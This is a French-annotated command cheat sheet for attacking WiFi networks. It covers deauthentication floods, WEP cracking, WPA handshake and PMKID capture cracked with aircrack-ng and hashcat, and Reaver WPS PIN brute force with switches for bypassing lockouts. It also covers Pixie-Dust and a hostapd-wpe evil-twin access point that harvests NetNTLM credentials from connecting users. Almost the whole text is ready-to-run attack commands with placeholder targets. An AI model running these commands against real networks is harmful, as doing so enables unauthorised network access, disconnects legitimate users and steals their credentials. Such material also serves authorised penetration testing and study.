# Avec aircrack-ng
# activer le mode monitor
sudo airmon-ng start wlan0mon

# Simple ecoute passive
# Pour trouver des points d'accès
sudo airodump-ng wlan0mon

# Ecoute ciblée avec le bssid voulu
# Ciblé sur une cible et un channel
sudo airodump-ng wlan0mon --bssid xx:xx:xx:xx:xx:xx –c 1 –w outfile

# WEP est un ancien protocole de cryptage mais encore utilisé dans certains endroits
# Il est possible de le cracker directement

# La seule exigence est d'obtenir suffisamment d'IV
# Le processus peut être amélioré en envoyant des paquets deauth
# -0 == attaque detauth, envoi de 3 paquets (peut être augmenté)
aireplay-ng -0 3 -a <TARGET_AP_MAC> wlan0mon -w 

# Une autre possibilité est d'utiliser une fausse authentification
# -1 = fausse authentification
# 0 = délai entre les demandes d'association
# -e = AP ESSID (nom)
# -a = AP MAC
# -h = MAC attaquant
aireplay-ng -1 0 -e test -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 wlan0mon

# On peut aussi passer par le sniffing et injection ARP 
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 wlan0mon

# On peut ensuite simplement cracker la clè comme ceci
aircrack-ng outfile -w wordlist

# Vous pouvez d'abord vous concentrer sur un AP en utilisant airodump-ng (voir la section de monitoring)
# Ici, vous voulez obtenir le handshake WPA
# Il nécessite un trafic réseau entre le point d'accès et un appareil

#Dumping
sudo airodump-ng wlan0mon --bssid xx:xx:xx:xx:xx:xx –c 1 –w outfile

# Désactivez les appareils connectés pour lancer le processus d'authentification et essayez d'obtenir le handshake
aireplay-ng --deauth 15 -a <TARGET_AP_MAC> wlan0mon
aireplay-ng -0 15 -a <TARGET_AP_MAC> wlan0mon

#On peut ensuite tenter de cracker la clè
aircrack-ng outfile -w wordlist

# Vous n'avez pas besoin de trafic réseau pour cette attaque
# Utilisation de hcxtools et hcxdumptool

# D'abord il faut activer le mode monitor
sudo airmon-ng start wlan0mon

# capturer le PMKID
# La capture du PKMID peut prendre un certain temps (plusieurs minutes)
# Si un point d'accès reçoit notre paquet de demande d'association et prend en charge l'envoi
sudo hcxdumptool -i wlan0mon -o outfile.pcapng --enable_status=1

# Ensuite, convertissez les données capturées dans un format approprié pour hashcat
# -E récupérer les mots de passe possibles du trafic WiFi (en plus, cette liste inclura les ESSID)
# -I récupère les identités du trafic WiFi
# -U récupère les noms d'utilisateur du trafic WiFi
sudo hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

#Enfin on utilise hashcat pour cracker le resultat
hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

# Reaver Attack
# Bruteforcing en ligne du code PIN WPS à 8 chiffres
# Un peu vieux et peut être obsolète de nos jours, mais toujours utilisable

# Outil de dumping intégré Reaver (airodump-ng peut également être utilisé))
# Wash donne des informations sur le WPS verrouillé ou non
# Les WPS verrouillés auront moins de chances de succès
wash -i wlan0mon

reaver -i wlan0mon -c 6 -b 00:23:69:48:33:95 -vv

# Certains constructeurs ont mis en place des protections
# Vous pouvez essayer différents commutateurs pour les contourner
# -L = Ignorer l'état verrouillé
# -N = Ne pas envoyer de paquets NACK lorsque des erreurs sont détectées
# -d = délai de X secondes entre les tentatives de code PIN
# -T = définir le délai d'attente sur X seconde (.5 signifie une demi-seconde)
# -r = Après X tentatives, veille pendant Y secondes
reaver -i mon0 -c 6 -b 00:23:69:48:33:95  -vv -L -N -d 15 -T .5 -r 3:15

# Pixie-Dust attack
# Fait avec Reaver + PixieWPS
# Cette attaque est basée sur seed / false random

# lancer reaver, nous avons besoin du PKE, PKR, e-hash 1 & e-hash 2, E-nonce / R-nonce
# et la clé d'authentification de Reaver à utiliser pour pixiewps
reaver -i wlan0mon -c 6 -b 00:23:69:48:33:95 -vv -S

# Maintenant, en utilisant pixiexps, vous pouvez déchiffrer le code PIN hors ligne
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>

# Enfin, vous pouvez utiliser le code PIN avec Reaver pour accéder au mot de passe en clair
reaver -i <monitor interface> -b <bssid> -c <channel>  -p <PIN>

# Démarrer le mode monitoring
# Si vous prévoyez d'utiliser une attaque deauth, connectez les 2 interfaces eth en même temps
# Pour éviter d'avoir wlan0mon et wlan0 (cela peut entrer en conflit)
sudo airmon-ng start wlan0

# Si des processus bloquent le mode monitoring, kill
sudo airmon-ng check kill
sudo kill <PID>

# Obtenir l'AP cible (ESSID)
# Votre cible peut avoir plusieurs AP, et donc plusieurs adresses MAC
# Ils peuvent fonctionner sur différents canaux
sudo airodump wlan0mon


# Définissez ensuite la cible dans le fichier de configuration
sudo nano /etc/hostapd-wpe/hostapd-wpe.conf
ssid=<ESSID>


# Démarrez le point d'accès
# Vous n'obtiendrez que les personnes qui se connectent récemment à l'AP cible
# Si vous voulez que les gens soient déjà connectés, vous devez pousser l'attaque plus loin avec le deauth
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

# démarrer la deuxième interface ethernet
sudo airmon-ng start wlan1

# Deauth (Dans un autre terminal)
# Basé sur les différents ESSID et canaux trouvés à l'étape 3
# -0 est le nombre de paquets deauth envoyés
sudo aireplay-ng -0 10 -a <mac address> -c <channel>

# Maintenant vous n'avez plus qu'à attendre des identifiants
# Vous obtiendrez probablement des hachages NetNTLMv1 que vous devrez cracker